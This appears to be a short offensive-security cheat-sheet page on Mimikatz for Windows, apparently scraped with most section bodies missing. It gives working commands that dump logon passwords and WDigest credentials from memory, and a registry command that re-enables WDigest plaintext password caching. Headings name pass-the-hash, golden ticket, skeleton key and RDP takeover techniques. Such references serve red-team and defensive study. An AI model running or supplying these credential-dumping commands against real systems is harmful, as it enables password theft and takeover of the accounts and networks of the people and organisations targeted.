Mimikatz
Windows - Mimikatz
Summary
Mimikatz - Execute commands
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exitPS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigestMimikatz - Extract passwords
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
# to re-enable wdigest in Windows Server 2012+
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD 'UseLogonCredential' with the value 1.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1Mimikatz - LSA Protection Workaround
Mimikatz - Mini Dump
Mimikatz - Pass The Hash
Mimikatz - Golden ticket
Mimikatz - Skeleton key
Mimikatz - RDP session takeover
Mimikatz - Credential Manager & DPAPI
Mimikatz - Commands list
Mimikatz - Powershell version
References
Last updated